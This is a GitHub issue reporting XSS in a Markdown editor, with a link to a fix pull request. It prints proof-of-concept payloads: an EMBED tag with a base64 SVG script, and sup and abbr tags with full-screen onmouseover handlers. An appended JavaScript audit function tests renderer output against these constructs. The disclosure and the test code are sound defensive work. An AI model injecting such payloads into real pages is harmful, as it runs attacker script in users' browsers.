Open j1nse opened 4 years ago
Hi @shequ123, thanks for creating an issue for this! I opened a pull request implementing changes to fix these problems and it correctly blocks those scenarios from happening in the editor. Pull request: https://github.com/jbt/markdown-editor/pull/110
This label and attack vector will cause XSS. Payload:
![xss3](https://user-images.githubusercontent.com/22301107/62463588-f8f43780-b7bc-11e9-8bb5-4337e6c2b5e6.PNG)
```html
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIGlkPSJ4c3MiPjxzY3JpcHQgdHlwZT0idGV4dC9lY21hc2NyaXB0Ij5hbGVydCgieHNzISIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
<sup style="position:fixed;left:0;top:0;width:10000px;height:10000px;" onmouseover="alert('xss')">sup</sup>
<abbr style="position:fixed;left:0;top:0;width:10000px;height:10000px;" onmouseover="alert('xss')">abbr</abbr>
```
If you type the payload, the XSS vulnerability will be triggered.
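A regression check for the constructs these payloads rely on (a disallowed `embed` tag, a `style` attribute, an `on*` event handler), written as an added example that is not part of the issue or the project's code. The allowlists, the function name `auditHtml` and the shortened sample strings are assumptions.

```javascript
// Added example: audit HTML produced by a Markdown renderer before it is trusted.
// The allowlists are assumptions chosen for illustration, not the editor's policy.
const ALLOWED_TAGS = new Set(['p', 'a', 'img', 'em', 'strong', 'code', 'pre', 'ul',
  'ol', 'li', 'blockquote', 'h1', 'h2', 'h3', 'sup', 'sub', 'abbr', 'br', 'hr']);
const ALLOWED_ATTRS = new Set(['href', 'src', 'alt', 'title']);
const URL_ATTRS = new Set(['href', 'src']);
const SAFE_URL = /^(https?:|mailto:|#|\/)/i;

// An opening tag (name + raw attribute text), and a single attribute inside it.
const TAG_RE = /<([a-zA-Z][a-zA-Z0-9-]*)((?:\s+[^\s"'>\/=]+(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+))?)*)\s*\/?>/g;
const ATTR_RE = /([^\s"'>\/=]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;

function auditHtml(html) {
  const findings = [];
  const tags = [...html.matchAll(TAG_RE)];
  for (const [, rawTag, rawAttrs] of tags) {
    const tag = rawTag.toLowerCase();
    if (!ALLOWED_TAGS.has(tag)) {
      findings.push(`${tag}: tag not allowed`);
      continue;
    }
    for (const m of rawAttrs.matchAll(ATTR_RE)) {
      const name = m[1].toLowerCase();
      const value = (m[2] || m[3] || m[4] || '').trim();
      if (name.startsWith('on')) findings.push(`${tag}: event handler ${name}`);
      else if (!ALLOWED_ATTRS.has(name)) findings.push(`${tag}: attribute ${name} not allowed`);
      else if (URL_ATTRS.has(name) && !SAFE_URL.test(value)) findings.push(`${tag}: unsafe URL in ${name}`);
    }
  }
  // Fail closed: every "<letter" must have been consumed as a well-formed tag.
  const opens = (html.match(/<[a-zA-Z]/g) || []).length;
  if (opens !== tags.length) findings.push('markup the audit could not parse');
  return findings;
}

// Constructed samples modelled on the report; the base64 body is a placeholder.
const SAMPLES = {
  embed: '<EMBED SRC="data:image/svg+xml;base64,AAAA" type="image/svg+xml" AllowScriptAccess="always"></EMBED>',
  sup: '<sup style="position:fixed;left:0;top:0;width:10000px;height:10000px;" onmouseover="alert(\'xss\')">sup</sup>',
  benign: '<p>Hello <a href="https://example.com">link</a></p>',
};

for (const [name, html] of Object.entries(SAMPLES)) {
  console.log(name, auditHtml(html));
}
```

In the browser the rendered HTML should still pass through a DOM-based sanitizer; a string-level audit like this belongs in a test suite run over renderer output.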